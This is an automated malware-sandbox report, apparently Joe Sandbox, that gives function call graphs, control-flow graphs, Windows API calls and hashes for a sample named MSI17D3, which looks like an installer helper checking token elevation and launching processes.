32955 cb47d1 32956 cb47e2 32955->32956 33085 cb11d0 RaiseException Concurrency::cancel_current_task 32955->33085 32956->32836 32960 cb57c0 4 API calls 32959->32960 32961 cb4bed 32960->32961 32962 cb4bf3 32961->32962 32963 cb4c15 CoInitialize CoCreateInstance 32961->32963 32964 cb52f0 89 API calls 32962->32964 32965 cb4c58 VariantInit 32963->32965 32966 cb4c4f 32963->32966 32967 cb4c0d 32964->32967 32968 cb4c9e 32965->32968 32966->32967 32969 cb5187 CoUninitialize 32966->32969 32970 cd2937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 32967->32970 32971 cb4cb1 IUnknown_QueryService 32968->32971 32975 cb4ca8 VariantClear 32968->32975 32969->32967 32972 cb51a7 32970->32972 32974 cb4ce0 32971->32974 32971->32975 32972->32860 32974->32975 32976 cb4d31 IUnknown_QueryInterface_Proxy 32974->32976 32975->32966 32976->32975 32977 cb4d5a 32976->32977 32977->32975 32978 cb4d7f IUnknown_QueryInterface_Proxy 32977->32978 32978->32975 32979 cb4da8 CoAllowSetForegroundWindow 32978->32979 32980 cb4e28 SysAllocString 32979->32980 32981 cb4dc2 SysAllocString 32979->32981 32980->32981 32983 cb51b0 _com_issue_error 32980->32983 32984 cb4df8 SysAllocString 32981->32984 32985 cb4def 32981->32985 33090 cb11d0 RaiseException Concurrency::cancel_current_task 32983->33090 32987 cb4e3d VariantInit 32984->32987 32988 cb4e1d 32984->32988 32985->32983 32985->32984 32992 cb4ebd 32987->32992 32988->32983 32988->32987 32990 cb4ec1 VariantClear VariantClear VariantClear VariantClear SysFreeString 32990->32975 32992->32990 33000 cb4f1b 32992->33000 32993 cb24c0 47 API calls 32993->33000 32996 cb2e60 42 API calls 32996->33000 32997 cb4fd5 OpenProcess WaitForSingleObject 32999 cb500b GetExitCodeProcess 32997->32999 32997->33000 32999->33000 33000->32990 33000->32992 33000->32993 33000->32996 33000->32997 33001 cb5025 CloseHandle 33000->33001 33002 cb51ab 33000->33002 33003 cb506e LocalFree 33000->33003 33086 cb12f0 49 API calls 2 library calls 33000->33086 33087 cb3860 119 API calls 2 library calls 33000->33087 33088 cb4270 10 API calls 33000->33088 33001->33000 33089 cd7027 41 API calls 2 library calls 33002->33089 33003->33000 33005->32829 33006->32844 33007->32855 33008->32823 33009->32839 33010->32851 33012 cb5361 33011->33012 33091 cb5d30 33012->33091 33014 cb537b 33015 cb5d30 41 API calls 33014->33015 33016 cb538b 33015->33016 33095 cb59c0 33016->33095 33018 cb57b0 33114 cb11d0 RaiseException Concurrency::cancel_current_task 33018->33114 33021 cb539b 33021->33018 33103 cd7852 33021->33103 33024 cb53e1 33025 cb5d30 41 API calls 33024->33025 33039 cb53f5 33025->33039 33026 cb54cc 33027 cb551d GetForegroundWindow 33026->33027 33032 cb5529 33026->33032 33027->33032 33028 cb55f7 ShellExecuteExW 33029 cb5609 33028->33029 33030 cb5612 33028->33030 33112 cb5890 6 API calls 33029->33112 33034 cb5646 33030->33034 33035 cb5625 ShellExecuteExW 33030->33035 33031 cb5493 GetWindowsDirectoryW 33110 cb5b10 70 API calls 33031->33110 33032->33028 33032->33032 33042 cb56fd 33034->33042 33043 cb566c GetModuleHandleW GetProcAddress 33034->33043 33035->33034 33037 cb563d 33035->33037 33113 cb5890 6 API calls 33037->33113 33038 cb54b4 33111 cb5b10 70 API calls 33038->33111 33039->33026 33039->33031 33044 cb5721 33042->33044 33047 cb570e WaitForSingleObject GetExitCodeProcess 33042->33047 33046 cb568a AllowSetForegroundWindow 33043->33046 33106 cb5940 33044->33106 33046->33042 33048 cb5698 33046->33048 33047->33044 33048->33042 33049 cb56a1 GetModuleHandleW GetProcAddress 33048->33049 33050 cb56fa 33049->33050 33051 cb56b4 33049->33051 33050->33042 33055 cb56c8 Sleep EnumWindows 33051->33055 33056 cb56ed 33051->33056 33053 cd2937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 33054 cb57a8 33053->33054 33054->32860 33055->33051 33055->33056 33183 cb5830 GetWindowThreadProcessId GetWindowLongW 33055->33183 33056->33050 33057 cb56f3 BringWindowToTop 33056->33057 33057->33050 33060 cb5ebe GetLastError 33059->33060 33061 cb5e18 33059->33061 33060->33061 33062 cb5ec9 33060->33062 33061->32800 33061->32801 33063 cb5f0e GetTokenInformation 33062->33063 33064 cb5ee9 33062->33064 33065 cb5ed9 codecvt 33062->33065 33063->33061 33068 cb60d0 45 API calls 2 library calls 33064->33068 33065->33063 33067 cb5ef2 33067->33063 33068->33067 33074->32930 33075->32936 33076->32928 33077->32933 33078->32937 33079->32940 33080->32946 33081->32946 33082->32946 33083->32953 33084->32955 33086->33000 33087->33000 33088->33000 33092 cb5d6e 33091->33092 33093 cb5d7d 33092->33093 33115 cb4a10 41 API calls 3 library calls 33092->33115 33093->33014 33096 cb59f8 33095->33096 33098 cb5a03 33095->33098 33097 cb5d30 41 API calls 33096->33097 33099 cb5a01 33097->33099 33100 cb2310 56 API calls 33098->33100 33101 cb5a1a 33098->33101 33099->33021 33100->33101 33116 cb5a60 42 API calls 33101->33116 33117 cd7869 33103->33117 33107 cb572d 33106->33107 33108 cb5971 33106->33108 33107->33053 33108->33107 33109 cb5981 CloseHandle 33108->33109 33109->33107 33110->33038 33111->33026 33112->33030 33113->33034 33115->33093 33116->33099 33122 cd7078 33117->33122 33123 cd7096 33122->33123 33129 cd708f 33122->33129 33123->33129 33167 ce57cc 41 API calls 3 library calls 33123->33167 33125 cd70b7 33168 ce5ab7 41 API calls __Getcoll 33125->33168 33127 cd70cd 33169 ce5b15 41 API calls __cftoe 33127->33169 33130 cd76d9 33129->33130 33131 cd7709 ___crtCompareStringW 33130->33131 33132 cd76f3 33130->33132 33131->33132 33135 cd7720 33131->33135 33170 cd7370 14 API calls __dosmaperr 33132->33170 33134 cd76f8 33171 cd7017 41 API calls ___std_exception_copy 33134->33171 33139 cd7702 33135->33139 33172 ce5c2a 6 API calls 2 library calls 33135->33172 33138 cd776e 33140 cd778f 33138->33140 33141 cd7778 33138->33141 33142 cd2937 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 33139->33142 33145 cd77a5 33140->33145 33146 cd7794 33140->33146 33173 cd7370 14 API calls __dosmaperr 33141->33173 33143 cb53d3 33142->33143 33143->33018 33143->33024 33148 cd7826 33145->33148 33150 cd77cc 33145->33150 33155 cd77b9 __alloca_probe_16 33145->33155 33175 cd7370 14 API calls __dosmaperr 33146->33175 33180 cd7370 14 API calls __dosmaperr 33148->33180 33149 cd777d 33174 cd7370 14 API calls __dosmaperr 33149->33174 33176 ce5bdc 15 API calls 2 library calls 33150->33176 33153 cd782b 33181 cd7370 14 API calls __dosmaperr 33153->33181 33155->33148 33160 cd77e6 33155->33160 33157 cd77d2 33157->33148 33157->33155 33158 cd7813 33182 cd2326 14 API calls _Mpunct 33158->33182 33177 ce5c2a 6 API calls 2 library calls 33160->33177 33162 cd7802 33163 cd7809 33162->33163 33164 cd781a 33162->33164 33178 cdb762 41 API calls 2 library calls 33163->33178 33179 cd7370 14 API calls __dosmaperr 33164->33179 33167->33125 33168->33127 33169->33129 33170->33134 33171->33139 33172->33138 33173->33149 33174->33139 33175->33134 33176->33157 33177->33162 33178->33158 33179->33158 33180->33153 33181->33158 33182->33139

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 cb4ba0-cb4bf1 call cb57c0 3 cb4bf3-cb4c10 call cb52f0 0->3 4 cb4c15-cb4c4d CoInitialize CoCreateInstance 0->4 12 cb5190-cb51aa call cd2937 3->12 6 cb4c58-cb4ca6 VariantInit 4->6 7 cb4c4f-cb4c53 4->7 17 cb4ca8-cb4cac 6->17 18 cb4cb1-cb4cd5 IUnknown_QueryService 6->18 9 cb5169-cb5172 7->9 10 cb517a-cb5185 9->10 11 cb5174-cb5176 9->11 14 cb518d 10->14 15 cb5187 CoUninitialize 10->15 11->10 14->12 15->14 20 cb514b-cb5154 17->20 21 cb4ce0-cb4cfa 18->21 22 cb4cd7-cb4cdb 18->22 24 cb515c-cb5167 VariantClear 20->24 25 cb5156-cb5158 20->25 28 cb4cfc-cb4d00 21->28 29 cb4d05-cb4d26 21->29 23 cb513a-cb5143 22->23 23->20 26 cb5145-cb5147 23->26 24->9 25->24 26->20 30 cb5129-cb5132 28->30 33 cb4d28-cb4d2c 29->33 34 cb4d31-cb4d4f IUnknown_QueryInterface_Proxy 29->34 30->23 32 cb5134-cb5136 30->32 32->23 35 cb5118-cb5121 33->35 36 cb4d5a-cb4d74 34->36 37 cb4d51-cb4d55 34->37 35->30 38 cb5123-cb5125 35->38 42 cb4d7f-cb4d9d IUnknown_QueryInterface_Proxy 36->42 43 cb4d76-cb4d7a 36->43 39 cb5107-cb5110 37->39 38->30 39->35 40 cb5112-cb5114 39->40 40->35 45 cb4da8-cb4dc0 CoAllowSetForegroundWindow 42->45 46 cb4d9f-cb4da3 42->46 44 cb50f6-cb50ff 43->44 44->39 50 cb5101-cb5103 44->50 48 cb4e28-cb4e35 SysAllocString 45->48 49 cb4dc2-cb4dc4 45->49 47 cb50e5-cb50ee 46->47 47->44 51 cb50f0-cb50f2 47->51 53 cb4e3b 48->53 54 cb51ba-cb5201 call cb11d0 48->54 52 cb4dca-cb4ded SysAllocString 49->52 50->39 51->44 55 cb4df8-cb4e1b SysAllocString 52->55 56 cb4def-cb4df2 52->56 53->52 64 cb5209-cb5217 54->64 65 cb5203-cb5205 54->65 59 cb4e3d-cb4ebf VariantInit 55->59 60 cb4e1d-cb4e20 55->60 56->55 58 cb51b0-cb51b5 call cbcf40 56->58 58->54 67 cb4eca-cb4ece 59->67 68 cb4ec1-cb4ec5 59->68 60->58 63 cb4e26 60->63 63->59 65->64 69 cb509c 67->69 70 cb4ed4 67->70 71 cb50a0-cb50df VariantClear * 4 SysFreeString 68->71 69->71 72 cb4ed6-cb4f0c 70->72 71->47 73 cb4f10-cb4f19 72->73 73->73 74 cb4f1b-cb4fa2 call cb24c0 call cb12f0 call cb3860 call cb2e60 * 2 73->74 85 cb4faa 74->85 86 cb4fa4-cb4fa8 74->86 87 cb4fb1-cb4fb3 85->87 86->87 88 cb4fb9-cb4fc3 87->88 89 cb5036-cb5046 87->89 90 cb4fd5-cb5009 OpenProcess WaitForSingleObject 88->90 91 cb4fc5-cb4fd3 call cb4270 88->91 92 cb5048-cb5057 89->92 93 cb508d-cb5096 89->93 95 cb500b-cb500d GetExitCodeProcess 90->95 96 cb5013-cb5023 90->96 91->90 97 cb506a-cb506c 92->97 98 cb5059-cb5064 92->98 93->69 93->72 95->96 96->89 100 cb5025-cb502c CloseHandle 96->100 102 cb506e-cb506f LocalFree 97->102 103 cb5075-cb5086 97->103 98->97 101 cb51ab call cd7027 98->101 100->89 101->58 102->103 103->93
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CB57C0: GetCurrentProcess.KERNEL32(00000008,?,665E9022,?,-00000010), ref: 00CB57D0
                                                                                                                                                                                  • Part of subcall function 00CB57C0: OpenProcessToken.ADVAPI32(00000000), ref: 00CB57D7
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00CB4C15
                                                                                                                                                                                • CoCreateInstance.OLE32(00CF72B0,00000000,00000004,00D05104,00000000,?), ref: 00CB4C45
                                                                                                                                                                                • CoUninitialize.COMBASE ref: 00CB5187
                                                                                                                                                                                • _com_issue_error.COMSUPP ref: 00CB51B5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 928366108-0
                                                                                                                                                                                • Opcode ID: 8a3544a13ce6ef16a3b5d71bcaaff28736fda8ae0c4e097357f0887cc7a8295f
                                                                                                                                                                                • Instruction ID: b64da5457166fc758ee2381ab426f71de08696776a61e12544085615929ef903
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a3544a13ce6ef16a3b5d71bcaaff28736fda8ae0c4e097357f0887cc7a8295f
                                                                                                                                                                                • Instruction Fuzzy Hash: 31229F70E04388DFEF11CFA8C948BEEBBB8AF55304F148199E409EB281D7759A45CB61

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 105 cb6a50-cb6a82 106 cb6aa3-cb6add GetCurrentProcess OpenProcessToken 105->106 107 cb6a84-cb6aa2 call cd2937 105->107 111 cb6b09-cb6b1e call cb5de0 106->111 112 cb6adf-cb6af2 106->112 119 cb6b2e-cb6b30 111->119 120 cb6b20-cb6b2c call cb1770 111->120 113 cb6b02-cb6b04 112->113 114 cb6af4-cb6afb CloseHandle 112->114 116 cb6c24-cb6c2b call cb57c0 113->116 114->113 125 cb6ddb-cb6e06 call cb2310 116->125 126 cb6c31-cb6c35 116->126 123 cb6b3f-cb6ba5 call cb5f40 call cb24c0 119->123 124 cb6b32-cb6b3d call cb1770 119->124 120->112 141 cb6bdb 123->141 142 cb6ba7-cb6ba9 123->142 124->112 139 cb6e0c-cb6e2b call cb46f0 125->139 140 cb6f96-cb6fa0 call cb11d0 125->140 126->125 130 cb6c3b-cb6c3d 126->130 130->125 134 cb6c43-cb6c59 call cb2310 130->134 134->140 149 cb6c5f-cb6c7e call cb46f0 134->149 158 cb6e59-cb6e6a call cb2310 139->158 159 cb6e2d-cb6e2f 139->159 148 cb6bdd-cb6c14 call cb2e60 * 2 call cb1770 141->148 146 cb6c88-cb6c8a 142->146 147 cb6baf-cb6bb8 142->147 146->148 147->141 152 cb6bba-cb6bbc 147->152 148->116 184 cb6c16-cb6c1d CloseHandle 148->184 173 cb6cad-cb6cc9 call cb2310 149->173 174 cb6c80-cb6c82 149->174 155 cb6bbf 152->155 155->141 160 cb6bc1-cb6bc4 155->160 158->140 178 cb6e70-cb6e8c call cb46f0 158->178 163 cb6e31-cb6e33 159->163 164 cb6e35-cb6e3a 159->164 160->146 165 cb6bca-cb6bd9 160->165 169 cb6e4f-cb6e54 call cb4ac0 163->169 170 cb6e40-cb6e49 164->170 165->141 165->155 169->158 170->170 176 cb6e4b-cb6e4d 170->176 173->140 189 cb6ccf-cb6ceb call cb46f0 173->189 180 cb6c8f-cb6c91 174->180 181 cb6c84-cb6c86 174->181 176->169 193 cb6eb9-cb6ec6 call cb2310 178->193 194 cb6e8e-cb6e90 178->194 182 cb6c94-cb6c9d 180->182 185 cb6ca3-cb6ca8 call cb4ac0 181->185 182->182 187 cb6c9f-cb6ca1 182->187 184->116 185->173 187->185 203 cb6d19-cb6d26 call cb2310 189->203 204 cb6ced-cb6cef 189->204 193->140 208 cb6ecc-cb6ee8 call cb46f0 193->208 196 cb6e92-cb6e94 194->196 197 cb6e96-cb6e9b 194->197 200 cb6eaf-cb6eb4 call cb4ac0 196->200 201 cb6ea0-cb6ea9 197->201 200->193 201->201 206 cb6eab-cb6ead 201->206 203->140 216 cb6d2c-cb6d48 call cb46f0 203->216 209 cb6cf1-cb6cf3 204->209 210 cb6cf5-cb6cfa 204->210 206->200 221 cb6eea-cb6eec 208->221 222 cb6f10-cb6f47 call cb52f0 208->222 213 cb6d0f-cb6d14 call cb4ac0 209->213 211 cb6d00-cb6d09 210->211 211->211 214 cb6d0b-cb6d0d 211->214 213->203 214->213 231 cb6d4a-cb6d4c 216->231 232 cb6d70-cb6d85 call cb4ba0 216->232 224 cb6eee-cb6ef0 221->224 225 cb6ef2-cb6ef4 221->225 236 cb6f49-cb6f4c 222->236 237 cb6f51-cb6f65 222->237 228 cb6f06-cb6f0b call cb4ac0 224->228 229 cb6ef7-cb6f00 225->229 228->222 229->229 234 cb6f02-cb6f04 229->234 238 cb6d4e-cb6d50 231->238 239 cb6d52-cb6d54 231->239 240 cb6d8a-cb6da4 232->240 234->228 236->237 242 cb6f6f-cb6f76 237->242 243 cb6f67-cb6f6a 237->243 241 cb6d66-cb6d6b call cb4ac0 238->241 244 cb6d57-cb6d60 239->244 248 cb6dae-cb6dc2 240->248 249 cb6da6-cb6da9 240->249 241->232 247 cb6f79-cb6f84 242->247 243->242 244->244 245 cb6d62-cb6d64 244->245 245->241 250 cb6f8e 247->250 251 cb6f86-cb6f89 247->251 252 cb6dcc-cb6dd6 248->252 253 cb6dc4-cb6dc7 248->253 249->248 250->140 251->250 252->247 253->252
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00CB6AC8
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CB6AD5
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CB6AF5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CloseCurrentHandleOpenToken
                                                                                                                                                                                • String ID: S-1-5-18
                                                                                                                                                                                • API String ID: 4052875653-4289277601
                                                                                                                                                                                • Opcode ID: a91b0b630428dfd52f3caa89a1e17aaf3a7fc21d1046974b047101fe85f0abf4
                                                                                                                                                                                • Instruction ID: d1cf589b5f0b1edfa200efb37e2aa6b3a91e5b61def7203f4895fdd87c55cde6
                                                                                                                                                                                • Opcode Fuzzy Hash: a91b0b630428dfd52f3caa89a1e17aaf3a7fc21d1046974b047101fe85f0abf4
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A02E470900259CFDF14DFA4C955BEEBBB5FF05314F148258E812AB282EB34AE05DB90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 254 cb57c0-cb57df GetCurrentProcess OpenProcessToken 255 cb57e1-cb57e6 254->255 256 cb57e7-cb5814 GetTokenInformation 254->256 257 cb581e-cb582e CloseHandle 256->257 258 cb5816-cb581b 256->258 258->257
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,?,665E9022,?,-00000010), ref: 00CB57D0
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00CB57D7
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00CB580C
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00CB5822
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 215268677-0
                                                                                                                                                                                • Opcode ID: 65fdd53c8e1aa134131ab522ae789636c71f36db452137e3c3da38b15fc6e216
                                                                                                                                                                                • Instruction ID: a9f4c5bc7a9f86b7e19f935adc3e5d691d15d790b643231e9e1ef74c70d052ea
                                                                                                                                                                                • Opcode Fuzzy Hash: 65fdd53c8e1aa134131ab522ae789636c71f36db452137e3c3da38b15fc6e216
                                                                                                                                                                                • Instruction Fuzzy Hash: 08F01D74148301ABEB109F20EC49BAE7BE8FF44700F508919F995D21A0DB79961CDB63

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCommandLineW.KERNEL32(665E9022,?,?,?,?,?,?,?,?,?,00CF56D5,000000FF), ref: 00CBCDE8
                                                                                                                                                                                  • Part of subcall function 00CB1F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00CB4251,665E9022,00000000,?,00000000,?,?,?,00CF4400,000000FF,?), ref: 00CB1F9D
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00CBCEB1
                                                                                                                                                                                  • Part of subcall function 00CB6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00CB667E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                                                                • String ID: Full command line:
                                                                                                                                                                                • API String ID: 1878577176-831861440
                                                                                                                                                                                • Opcode ID: 7f065876bc367d5f23ab370471b6bc3acd509d7dfd92614c9c7c14d5f9b1be4c
                                                                                                                                                                                • Instruction ID: 5c2beaa4be83c5afe3cb023e1a522ab06869677d06c2e1dc92ea36123e96ceef
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f065876bc367d5f23ab370471b6bc3acd509d7dfd92614c9c7c14d5f9b1be4c
                                                                                                                                                                                • Instruction Fuzzy Hash: A421D371910154ABCB15FB60DC95BEE73A5AF54740F144118F816A72D1EF386B08D7A2

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 291 cb5e40-cb5ebc GetTokenInformation 292 cb5ebe-cb5ec7 GetLastError 291->292 293 cb5f20-cb5f33 291->293 292->293 294 cb5ec9-cb5ed7 292->294 295 cb5ed9-cb5edc 294->295 296 cb5ede 294->296 297 cb5f0b 295->297 298 cb5f0e-cb5f1a GetTokenInformation 296->298 299 cb5ee0-cb5ee7 296->299 297->298 298->293 300 cb5ee9-cb5ef5 call cb60d0 299->300 301 cb5ef7-cb5f08 call cd4080 299->301 300->298 301->297
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00CB5E18,665E9022,?), ref: 00CB5EB4
                                                                                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00CB5E18,665E9022,?), ref: 00CB5EBE
                                                                                                                                                                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00CB5E18,665E9022,?), ref: 00CB5F1A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationToken$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2567405617-0
                                                                                                                                                                                • Opcode ID: f06103e4155bd1234983c5244250d6101ac71d83df38534cd5b48f264331a03d
                                                                                                                                                                                • Instruction ID: ce07bc5c810be70644cae845b9ced0ba82f5cb511fe62d409c15d8cc490e394f
                                                                                                                                                                                • Opcode Fuzzy Hash: f06103e4155bd1234983c5244250d6101ac71d83df38534cd5b48f264331a03d
                                                                                                                                                                                • Instruction Fuzzy Hash: D3315C71A00619AFDB24CF99CC45BBFFBF9FF44710F10452AE515A7280DBB5AA048BA0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 306 ce70bb-ce70c6 307 ce70c8-ce70d2 306->307 308 ce70d4-ce70da 306->308 307->308 309 ce7108-ce7113 call cd7370 307->309 310 ce70dc-ce70dd 308->310 311 ce70f3-ce7104 RtlAllocateHeap 308->311 316 ce7115-ce7117 309->316 310->311 312 ce70df-ce70e6 call ce5245 311->312 313 ce7106 311->313 312->309 319 ce70e8-ce70f1 call cebf83 312->319 313->316 319->309 319->311
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,?,?,00CE596A,00000001,00000364,?,00000006,000000FF,?,00CD6CE7,00000000,00CE3841,00000000), ref: 00CE70FC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                • Opcode ID: fda7f67be4ecff0b9528f94e765dcfad45550bac147ba8458ad7a21611268815
                                                                                                                                                                                • Instruction ID: d96c2dbf7d50299f6f76f8fa752dfa1a4a70a50cc47c451c8588589e09da8233
                                                                                                                                                                                • Opcode Fuzzy Hash: fda7f67be4ecff0b9528f94e765dcfad45550bac147ba8458ad7a21611268815
                                                                                                                                                                                • Instruction Fuzzy Hash: AAF0B43120C3A06B9B225B239D06B6F7749AF51770B144311BD28DA190CE60ED01A6E1

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
